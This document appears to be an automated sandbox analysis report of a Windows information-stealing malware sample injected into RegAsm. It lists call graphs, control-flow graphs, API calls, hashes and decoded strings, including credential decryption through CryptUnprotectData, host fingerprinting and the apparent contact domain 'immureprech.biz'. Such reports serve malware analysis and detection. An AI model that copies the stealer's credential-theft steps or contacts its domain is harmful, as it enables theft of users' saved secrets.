13786 438ea0 13787 438ec0 13786->13787 13789 438f3e 13787->13789 13794 43a9b0 LdrInitializeThunk 13787->13794 13789->13789 13791 439110 13789->13791 13793 43905e 13789->13793 13795 43a9b0 LdrInitializeThunk 13789->13795 13790 438e70 RtlFreeHeap 13790->13791 13793->13790 13794->13789 13795->13793 13796 43d0a0 13797 43d0c0 13796->13797 13800 43d0fe 13797->13800 13804 43a9b0 LdrInitializeThunk 13797->13804 13798 43d2d6 13800->13798 13803 43d1ef 13800->13803 13805 43a9b0 LdrInitializeThunk 13800->13805 13801 438e70 RtlFreeHeap 13801->13798 13803->13801 13803->13803 13804->13800 13805->13803 13806 435ea0 13807 435ec5 13806->13807 13810 435f79 13807->13810 13815 43a9b0 LdrInitializeThunk 13807->13815 13809 43606c 13812 43617c 13809->13812 13816 43a9b0 LdrInitializeThunk 13809->13816 13810->13809 13810->13812 13814 43a9b0 LdrInitializeThunk 13810->13814 13814->13810 13815->13807 13816->13809 13817 40dd25 13818 40dd2b 13817->13818 13819 40dd35 CoUninitialize 13818->13819 13820 40dd60 13819->13820 13599 415f66 13613 419770 13599->13613 13601 41666a 13650 43a9b0 LdrInitializeThunk 13601->13650 13602 4163d9 CryptUnprotectData 13602->13601 13611 416107 13602->13611 13603 41601e 13603->13603 13647 43a9b0 LdrInitializeThunk 13603->13647 13605 4169ff 13610 4162b1 CryptUnprotectData 13610->13601 13610->13611 13611->13601 13611->13602 13649 43a9b0 LdrInitializeThunk 13611->13649 13612 4160f2 13612->13610 13612->13611 13614 4197a0 13613->13614 13618 4197de 13614->13618 13656 43a9b0 LdrInitializeThunk 13614->13656 13616 41989e 13621 41991e 13616->13621 13628 415f6b 13616->13628 13651 43a9b0 LdrInitializeThunk 13616->13651 13618->13616 13657 43a9b0 LdrInitializeThunk 13618->13657 13620 419a2f 13622 438e70 RtlFreeHeap 13620->13622 13621->13620 13624 419a88 13621->13624 13652 43a9b0 LdrInitializeThunk 13621->13652 13622->13624 13625 419be8 LookupPrivilegeValueW 13624->13625 13624->13628 13631 419c50 13624->13631 13626 419d37 FreeLibrary 13625->13626 13627 419bfa 13625->13627 13626->13631 13632 419c4e 13627->13632 13653 43a9b0 LdrInitializeThunk 13627->13653 13628->13603 13628->13611 13628->13612 13648 43a9b0 LdrInitializeThunk 13628->13648 13630 419cd2 FreeLibrary 13634 419cf0 13630->13634 13631->13628 13658 43a9b0 LdrInitializeThunk 13631->13658 13632->13626 13632->13630 13636 419d32 13634->13636 13659 43a9b0 LdrInitializeThunk 13634->13659 13638 419e2e 13636->13638 13654 43a9b0 LdrInitializeThunk 13636->13654 13638->13628 13646 419f0e 13638->13646 13655 43a9b0 LdrInitializeThunk 13638->13655 13639 41a538 13640 438e70 RtlFreeHeap 13639->13640 13640->13628 13642 439140 LdrInitializeThunk 13642->13646 13643 4392b0 LdrInitializeThunk 13643->13646 13644 438e70 RtlFreeHeap 13644->13646 13645 43a9b0 LdrInitializeThunk 13645->13646 13646->13639 13646->13642 13646->13643 13646->13644 13646->13645 13647->13612 13648->13603 13649->13611 13650->13605 13651->13621 13652->13620 13653->13632 13654->13638 13655->13646 13656->13618 13657->13616 13658->13628 13659->13636 13660 43b068 13662 43b080 13660->13662 13661 43b16e 13664 43b23f 13661->13664 13667 43a9b0 LdrInitializeThunk 13661->13667 13662->13661 13666 43a9b0 LdrInitializeThunk 13662->13666 13666->13661 13667->13664 13821 420b30 13822 420b44 13821->13822 13826 420c51 13821->13826 13827 420c70 13822->13827 13824 420c2c 13825 41f0e0 LdrInitializeThunk 13824->13825 13824->13826 13825->13826 13829 420c80 13827->13829 13828 43cb20 LdrInitializeThunk 13830 420d8f 13828->13830 13829->13828 13829->13829 13668 40cff3 13669 40d010 13668->13669 13672 4361e0 13669->13672 13671 40d053 13673 436210 CoCreateInstance 13672->13673 13675 4367c2 13673->13675 13676 43641c SysAllocString 13673->13676 13677 4367d2 GetVolumeInformationW 13675->13677 13679 43648d 13676->13679 13686 4367f0 13677->13686 13680 4367b2 SysFreeString 13679->13680 13681 436495 CoSetProxyBlanket 13679->13681 13680->13675 13682 4364b5 SysAllocString 13681->13682 13683 4367a8 13681->13683 13685 436580 13682->13685 13683->13680 13685->13685 13687 43659c SysAllocString 13685->13687 13686->13671 13689 4365c3 13687->13689 13688 436796 SysFreeString SysFreeString 13688->13683 13689->13688 13690 436785 13689->13690 13691 43660e VariantInit 13689->13691 13690->13688 13693 436660 13691->13693 13692 436774 VariantClear 13692->13690 13693->13692 13831 43d830 13832 43d841 13831->13832 13835 43d92e 13832->13835 13839 43a9b0 LdrInitializeThunk 13832->13839 13833 43db06 13835->13833 13837 43da4e 13835->13837 13840 43a9b0 LdrInitializeThunk 13835->13840 13836 438e70 RtlFreeHeap 13836->13833 13837->13836 13839->13835 13840->13837 13694 43b3fb 13695 43b2b5 13694->13695 13695->13695 13696 43b3be 13695->13696 13698 43a9b0 LdrInitializeThunk 13695->13698 13698->13696 13841 431839 13842 43183e 13841->13842 13843 431874 GetSystemMetrics GetSystemMetrics 13842->13843 13844 4318b3 13843->13844 13699 42b4fc 13700 42b520 13699->13700 13700->13700 13701 42b5f4 FreeLibrary 13700->13701 13702 42b604 13701->13702 13703 42b614 GetComputerNameExA 13702->13703 13705 42b670 13703->13705 13704 42b70b GetComputerNameExA 13706 42b760 13704->13706 13705->13704 13705->13705

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 4361e0-436202 1 436210-436222 0->1 1->1 2 436224-436235 1->2 3 436240-436272 2->3 3->3 4 436274-4362b1 3->4 5 4362c0-436342 4->5 5->5 6 436348-436367 5->6 8 436374-43637f 6->8 9 436369 6->9 10 436380-4363bd 8->10 9->8 10->10 11 4363bf-436416 CoCreateInstance 10->11 12 4367c2-4367ee call 43c280 GetVolumeInformationW 11->12 13 43641c-43644f 11->13 18 4367f0-4367f4 12->18 19 4367f8-4367fa 12->19 15 436450-436463 13->15 15->15 17 436465-43648f SysAllocString 15->17 24 4367b2-4367be SysFreeString 17->24 25 436495-4364af CoSetProxyBlanket 17->25 18->19 20 436817-43681e 19->20 22 436820-436827 20->22 23 436837-43684f 20->23 22->23 26 436829-436835 22->26 27 436850-436862 23->27 24->12 28 4364b5-4364ca 25->28 29 4367a8-4367ae 25->29 26->23 27->27 31 436864-4368a8 27->31 30 4364d0-4364f4 28->30 29->24 30->30 32 4364f6-436576 SysAllocString 30->32 33 4368b0-43692d 31->33 34 436580-43659a 32->34 33->33 35 43692f-43696a call 41dd50 33->35 34->34 37 43659c-4365cc SysAllocString 34->37 39 436970-436978 35->39 42 4365d2-4365f4 37->42 43 436796-4367a6 SysFreeString * 2 37->43 39->39 41 43697a-43697c 39->41 44 436982-436992 call 407fe0 41->44 45 436800-436811 41->45 50 4365fa-4365fd 42->50 51 43678c-436792 42->51 43->29 44->45 45->20 47 436997-43699e 45->47 50->51 52 436603-436608 50->52 51->43 52->51 53 43660e-436656 VariantInit 52->53 54 436660-436690 53->54 54->54 55 436692-4366a4 54->55 56 4366a8-4366aa 55->56 57 4366b0-4366b6 56->57 58 436774-436785 VariantClear 56->58 57->58 59 4366bc-4366ca 57->59 58->51 60 43670d 59->60 61 4366cc-4366d1 59->61 64 43670f-436737 call 407f60 call 408d90 60->64 63 4366ec-4366f0 61->63 65 4366f2-4366fb 63->65 66 4366e0 63->66 75 436739 64->75 76 43673e-43674a 64->76 69 436702-436706 65->69 70 4366fd-436700 65->70 68 4366e1-4366ea 66->68 68->63 68->64 69->68 72 436708-43670b 69->72 70->68 72->68 75->76 77 436751-436771 call 407f90 call 407f70 76->77 78 43674c 76->78 77->58 78->77
                                                      APIs
                                                      • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
                                                      • SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
                                                      • SysAllocString.OLEAUT32(w!s#), ref: 004364FB
                                                      • SysAllocString.OLEAUT32(A3q5), ref: 004365A1
                                                      • VariantInit.OLEAUT32(?), ref: 00436613
                                                      • VariantClear.OLEAUT32(?), ref: 00436775
                                                      • SysFreeString.OLEAUT32(?), ref: 004367A0
                                                      • SysFreeString.OLEAUT32(?), ref: 004367A6
                                                      • SysFreeString.OLEAUT32(00000000), ref: 004367B3
                                                      • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004367E7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                      • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                      • API String ID: 2573436264-4124187736
                                                      • Opcode ID: ca50f7cf4d3e9b07668249a1021e5b411807a3e5f20311e201539803fa80780b
                                                      • Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
                                                      • Opcode Fuzzy Hash: ca50f7cf4d3e9b07668249a1021e5b411807a3e5f20311e201539803fa80780b
                                                      • Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 89 42b4fc-42b558 call 43c280 93 42b560-42b594 89->93 93->93 94 42b596-42b5a0 93->94 95 42b5a2-42b5a9 94->95 96 42b5bb-42b5c8 94->96 97 42b5b0-42b5b9 95->97 98 42b5ca-42b5d8 96->98 99 42b5ed 96->99 97->96 97->97 100 42b5e0-42b5e9 98->100 101 42b5f4-42b662 FreeLibrary call 43c280 GetComputerNameExA 99->101 100->100 103 42b5eb 100->103 106 42b670-42b6ac 101->106 103->101 106->106 107 42b6ae-42b6b8 106->107 108 42b6ba-42b6c1 107->108 109 42b6db-42b6e8 107->109 110 42b6d0-42b6d9 108->110 111 42b6ea-42b6f1 109->111 112 42b70b-42b75f GetComputerNameExA 109->112 110->109 110->110 113 42b700-42b709 111->113 114 42b760-42b791 112->114 113->112 113->113 114->114 115 42b793-42b79d 114->115 116 42b7bb-42b7c8 115->116 117 42b79f-42b7a6 115->117 119 42b7ca-42b7d1 116->119 120 42b7eb-42b83f 116->120 118 42b7b0-42b7b9 117->118 118->116 118->118 121 42b7e0-42b7e9 119->121 123 42b840-42b864 120->123 121->120 121->121 123->123 124 42b866-42b870 123->124 125 42b872-42b879 124->125 126 42b88b-42b898 124->126 127 42b880-42b889 125->127 128 42b89a-42b8a1 126->128 129 42b8bb-42b914 call 43c280 126->129 127->126 127->127 130 42b8b0-42b8b9 128->130 134 42b920-42b9a2 129->134 130->129 130->130 134->134 135 42b9a8-42b9b2 134->135 136 42b9b4-42b9bb 135->136 137 42b9cb-42b9e2 135->137 138 42b9c0-42b9c9 136->138 139 42b9e8-42b9ef 137->139 140 42bb29-42bb63 137->140 138->137 138->138 141 42b9f0-42b9fa 139->141 142 42bb70-42bb9e 140->142 143 42ba10-42ba16 141->143 144 42b9fc-42ba01 141->144 142->142 145 42bba0-42bbac 142->145 147 42ba40-42ba50 143->147 148 42ba18-42ba1b 143->148 146 42bad0-42bad4 144->146 149 42bbcb-42bbce call 42f3e0 145->149 150 42bbae-42bbb5 145->150 156 42bad6-42bade 146->156 153 42ba56-42ba59 147->153 154 42baea-42baf2 147->154 148->147 151 42ba1d-42ba32 148->151 159 42bbd3-42bbf3 149->159 152 42bbc0-42bbc9 150->152 151->146 152->149 152->152 153->154 158 42ba5f-42bac8 153->158 154->156 157 42baf4-42baf7 154->157 156->140 160 42bae0-42bae2 156->160 162 42bb25-42bb27 157->162 163 42baf9-42bb23 157->163 158->146 160->141 161 42bae8 160->161 161->140 162->146 163->146
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?), ref: 0042B5FE
                                                      • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042B63A
                                                      • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042B726
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ComputerName$FreeLibrary
                                                      • String ID: %(#}$/$/26-$1
                                                      • API String ID: 2243422189-261129489
                                                      • Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                      • Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
                                                      • Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                      • Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 168 42b4f7-42b60f call 43c280 171 42b614-42b662 GetComputerNameExA 168->171 172 42b670-42b6ac 171->172 172->172 173 42b6ae-42b6b8 172->173 174 42b6ba-42b6c1 173->174 175 42b6db-42b6e8 173->175 176 42b6d0-42b6d9 174->176 177 42b6ea-42b6f1 175->177 178 42b70b-42b75f GetComputerNameExA 175->178 176->175 176->176 179 42b700-42b709 177->179 180 42b760-42b791 178->180 179->178 179->179 180->180 181 42b793-42b79d 180->181 182 42b7bb-42b7c8 181->182 183 42b79f-42b7a6 181->183 185 42b7ca-42b7d1 182->185 186 42b7eb-42b83f 182->186 184 42b7b0-42b7b9 183->184 184->182 184->184 187 42b7e0-42b7e9 185->187 189 42b840-42b864 186->189 187->186 187->187 189->189 190 42b866-42b870 189->190 191 42b872-42b879 190->191 192 42b88b-42b898 190->192 193 42b880-42b889 191->193 194 42b89a-42b8a1 192->194 195 42b8bb-42b914 call 43c280 192->195 193->192 193->193 196 42b8b0-42b8b9 194->196 200 42b920-42b9a2 195->200 196->195 196->196 200->200 201 42b9a8-42b9b2 200->201 202 42b9b4-42b9bb 201->202 203 42b9cb-42b9e2 201->203 204 42b9c0-42b9c9 202->204 205 42b9e8-42b9ef 203->205 206 42bb29-42bb63 203->206 204->203 204->204 207 42b9f0-42b9fa 205->207 208 42bb70-42bb9e 206->208 209 42ba10-42ba16 207->209 210 42b9fc-42ba01 207->210 208->208 211 42bba0-42bbac 208->211 213 42ba40-42ba50 209->213 214 42ba18-42ba1b 209->214 212 42bad0-42bad4 210->212 215 42bbcb-42bbce call 42f3e0 211->215 216 42bbae-42bbb5 211->216 222 42bad6-42bade 212->222 219 42ba56-42ba59 213->219 220 42baea-42baf2 213->220 214->213 217 42ba1d-42ba32 214->217 225 42bbd3-42bbf3 215->225 218 42bbc0-42bbc9 216->218 217->212 218->215 218->218 219->220 224 42ba5f-42bac8 219->224 220->222 223 42baf4-42baf7 220->223 222->206 226 42bae0-42bae2 222->226 228 42bb25-42bb27 223->228 229 42baf9-42bb23 223->229 224->212 226->207 227 42bae8 226->227 227->206 228->212 229->212
                                                      APIs
                                                      • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042B63A
                                                      • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042B726
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ComputerName
                                                      • String ID: %(#}$/$/26-$1
                                                      • API String ID: 3545744682-261129489
                                                      • Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                      • Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
                                                      • Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                      • Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796
                                                      APIs
                                                        • Part of subcall function 0043A9B0: LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,83E681E1,?), ref: 00419BF0
                                                      • FreeLibrary.KERNEL32(?), ref: 00419CD6
                                                      • FreeLibrary.KERNEL32(?), ref: 00419D3B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeLibrary$InitializeLookupPrivilegeThunkValue
                                                      • String ID: ,)*k$I,~M
                                                      • API String ID: 2454411163-936430989
                                                      • Opcode ID: 409457163dc21f8bbcfc449a1199c6fa7c708d9abd1c96867b818197b9c04ebc
                                                      • Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
                                                      • Opcode Fuzzy Hash: 409457163dc21f8bbcfc449a1199c6fa7c708d9abd1c96867b818197b9c04ebc
                                                      • Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: in~x$kmbj$ydij$Z\
                                                      • API String ID: 0-979945983
                                                      • Opcode ID: 7cc7601ca1ee28cd6491a20fbffaf33e16e54dbc7ed2fef88dca781f2573c0e0
                                                      • Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
                                                      • Opcode Fuzzy Hash: 7cc7601ca1ee28cd6491a20fbffaf33e16e54dbc7ed2fef88dca781f2573c0e0
                                                      • Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 748 4210e0-421128 call 43c9a0 751 42112e-421190 call 414040 call 438e30 748->751 752 42188f-42189f 748->752 758 421192-421195 751->758 759 421197-4211bd 758->759 760 4211bf-4211c3 758->760 759->758 761 4211c5-4211d0 760->761 762 4211d2 761->762 763 4211d7-4211f0 761->763 764 42128f-421292 762->764 765 4211f2 763->765 766 4211f7-421202 763->766 769 421296-42129b 764->769 770 421294 764->770 767 42127e-421283 765->767 766->767 768 421204-421274 call 43a9b0 766->768 774 421287-42128a 767->774 775 421285 767->775 778 421279 768->778 771 4212a1-4212b1 769->771 772 4217be-4217f3 call 438e70 769->772 770->769 776 4212b3-4212e1 771->776 783 4217f5-4217f8 772->783 774->761 775->764 779 4212e7-421306 776->779 780 421499-42149d 776->780 778->767 782 421308-42130b 779->782 784 42149f-4214a2 780->784 785 421367-421383 call 4218a0 782->785 786 42130d-421365 782->786 787 421822-421828 783->787 788 4217fa-421820 783->788 789 4214a4-4214a8 784->789 790 4214aa-4214bb call 438e30 784->790 785->780 804 421389-4213b2 785->804 786->782 792 42182a-421830 787->792 788->783 793 4214cf-4214d1 789->793 801 4214cb-4214cd 790->801 802 4214bd-4214c6 790->802 799 421832 792->799 800 421834-421846 792->800 796 4214d7-4214f6 793->796 797 42178c-421791 793->797 803 4214f8-4214fb 796->803 805 421793-42179b 797->805 806 42179d-4217a1 797->806 807 42188d 799->807 808 42184a-421850 800->808 809 421848 800->809 801->793 810 4217a5-4217a9 802->810 811 421535-421570 803->811 812 4214fd-421533 803->812 813 4213b4-4213b7 804->813 814 4217a3 805->814 806->814 807->752 815 421878-42187b 808->815 816 421852-421874 call 43a9b0 808->816 809->815 810->776 822 4217af-4217b4 810->822 819 421572-421575 811->819 812->803 820 4213b9-4213da 813->820 821 4213dc-4213f7 call 4218a0 813->821 814->810 817 42187f-42188b 815->817 818 42187d 815->818 816->815 817->792 818->807 826 421577-42159d 819->826 827 42159f-4215ad 819->827 820->813 837 421402-421419 821->837 838 4213f9-4213fd 821->838 829 4218a0-4218b4 822->829 830 4217ba-4217bc 822->830 826->819 831 4215b1-4215bc 827->831 833 4218c0-4218c2 829->833 830->772 835 4215c3-4215e0 831->835 836 4215be 831->836 841 4218c4-4218cf 833->841 842 4218dc-4218e0 833->842 844 4215e2-4215e6 835->844 845 4215eb-4215fc 835->845 843 42169e-4216a1 836->843 839 42141b 837->839 840 42141d-421497 call 407f60 call 413c70 call 407f70 837->840 838->784 839->840 840->784 849 4218d1-4218d4 841->849 850 4218d8-4218da 841->850 851 4216a3-4216aa 843->851 852 4216ae-4216cd 843->852 847 42168d-421692 844->847 846 421602-42167c call 43a9b0 845->846 845->847 859 421681-421688 846->859 855 421696-421699 847->855 856 421694 847->856 849->833 857 4218d6 849->857 850->842 851->852 858 4216cf-4216d2 852->858 855->831 856->843 857->842 861 4216d4-42171b 858->861 862 42171d-42172d 858->862 859->847 861->858 864 421767-42176a 862->864 865 42172f-421733 862->865 866 42177b-42177d 864->866 867 42176c-421779 call 438e70 864->867 868 421735-42173c 865->868 871 42177f-421782 866->871 867->871 872 42173e-42174a 868->872 873 42174c-421759 868->873 871->797 878 421784-42178a 871->878 872->868 874 42175b 873->874 875 42175d 873->875 879 421763-421765 874->879 875->879 878->810 879->864
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !@$,$T$U$V$h
                                                      • API String ID: 0-1072848446
                                                      • Opcode ID: 08fd17aa8544526ba1d2fdfa3d98d6b8fa1c8c3fb107b928f0eb9ff563a42c2b
                                                      • Instruction ID: 7f4f8c271271a0ee30063bf5d57d9afa0b4a7bb7edff0777766b2e5d54dfe869
                                                      • Opcode Fuzzy Hash: 08fd17aa8544526ba1d2fdfa3d98d6b8fa1c8c3fb107b928f0eb9ff563a42c2b
                                                      • Instruction Fuzzy Hash: CF22E17160C3A08FD320DF28D44436FBBE1ABD6314F598A2EE5D9873A1D77988458B4B

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 882 40cff3-40d003 883 40d010-40d03a 882->883 883->883 884 40d03c-40d04e call 408660 call 4361e0 883->884 888 40d053-40d06f 884->888 889 40d070-40d0b1 888->889 889->889 890 40d0b3-40d0ff 889->890 891 40d100-40d157 890->891 891->891 892 40d159-40d163 891->892 893 40d165-40d168 892->893 894 40d17b-40d189 892->894 895 40d170-40d179 893->895 896 40d18b-40d18f 894->896 897 40d19d 894->897 895->894 895->895 898 40d190-40d199 896->898 899 40d1a0-40d1a8 897->899 898->898 902 40d19b 898->902 900 40d1aa-40d1ab 899->900 901 40d1bb-40d1c9 899->901 903 40d1b0-40d1b9 900->903 904 40d1db-40d29f 901->904 905 40d1cb-40d1cf 901->905 902->899 903->901 903->903 907 40d2a0-40d2e3 904->907 906 40d1d0-40d1d9 905->906 906->904 906->906 907->907 908 40d2e5-40d2fe 907->908 909 40d300-40d330 908->909 909->909 910 40d332-40d36e call 40ba00 909->910
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ABE4A45DB129FD4CDB71E32F12885CB3$BI$ZG$immureprech.biz$3ej$pr
                                                      • API String ID: 0-1435887362
                                                      • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                      • Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
                                                      • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                      • Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 913 408790-4087a1 call 43a360 916 408970-408972 ExitProcess 913->916 917 4087a7-4087ae call 4336c0 913->917 920 4087b4-4087d8 GetCurrentProcessId GetCurrentThreadId 917->920 921 40896b call 43a930 917->921 923 4087da-4087dc 920->923 924 4087de-408878 SHGetSpecialFolderPathW GetForegroundWindow 920->924 921->916 923->924 925 4088f3-40895f call 409bc0 924->925 926 40887a-4088f1 924->926 925->921 929 408961 call 40cb90 925->929 926->925 931 408966 call 40b9d0 929->931 931->921
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 004087B4
                                                      • GetCurrentThreadId.KERNEL32 ref: 004087BE
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
                                                      • GetForegroundWindow.USER32 ref: 00408870
                                                        • Part of subcall function 0040B9D0: FreeLibrary.KERNEL32(0040896B), ref: 0040B9D6
                                                        • Part of subcall function 0040B9D0: FreeLibrary.KERNEL32 ref: 0040B9F7
                                                      • ExitProcess.KERNEL32 ref: 00408972
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                      • String ID:
                                                      • API String ID: 3676751680-0
                                                      • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                      • Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
                                                      • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                      • Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 933 422e93-422e99 934 422ea2 933->934 935 422e9b-422ea0 933->935 936 422ea5-422ec3 call 407f60 934->936 935->936 940 422ed2-422edb 936->940 941 422eca 936->941 942 422ee4 940->942 943 422edd-422ee2 940->943 941->940 944 422eeb-422f1f call 407f60 942->944 943->944 947 422f20-422f66 944->947 947->947 948 422f68-422f70 947->948 949 422f72-422f77 948->949 950 422f91-422f9d 948->950 951 422f80-422f8f 949->951 952 422fc1-422fd9 call 43cb20 950->952 953 422f9f-422fa3 950->953 951->950 951->951 957 423292-4232af 952->957 958 423172 952->958 959 422ff0-422ff9 952->959 960 422fe0-422fe7 952->960 961 423160-423166 call 407f70 952->961 962 423170 952->962 963 42315a 952->963 964 423178-423222 952->964 965 423148-423152 952->965 966 423169-42316f 952->966 954 422fb0-422fbf 953->954 954->952 954->954 969 4232b0-4232c2 957->969 958->964 967 423002 959->967 968 422ffb-423000 959->968 960->959 961->966 962->958 963->961 971 423230-42326a 964->971 965->963 966->962 972 423009-4230af call 407f60 967->972 968->972 969->969 973 4232c4-423346 969->973 971->971 975 42326c-42327c call 4210e0 971->975 982 4230b0-4230c2 972->982 977 423350-42339e 973->977 979 423281-423284 975->979 977->977 981 4233a0-4233c7 call 420df0 977->981 979->957 982->982 984 4230c4-4230cc 982->984 986 4230f1-4230fd 984->986 987 4230ce-4230d5 984->987 989 423121-423141 GetLogicalDrives call 43cb20 986->989 990 4230ff-423103 986->990 988 4230e0-4230ef 987->988 988->986 988->988 989->957 989->958 989->961 989->962 989->963 989->965 989->966 991 423110-42311f 990->991 991->989 991->991
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )*$X9{;$r1B
                                                      • API String ID: 0-1001561910
                                                      • Opcode ID: 29ddd15023daed27f3a86534da84a75cb2074f1bccf2702bdac9cd2e3ed8f5f9
                                                      • Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
                                                      • Opcode Fuzzy Hash: 29ddd15023daed27f3a86534da84a75cb2074f1bccf2702bdac9cd2e3ed8f5f9
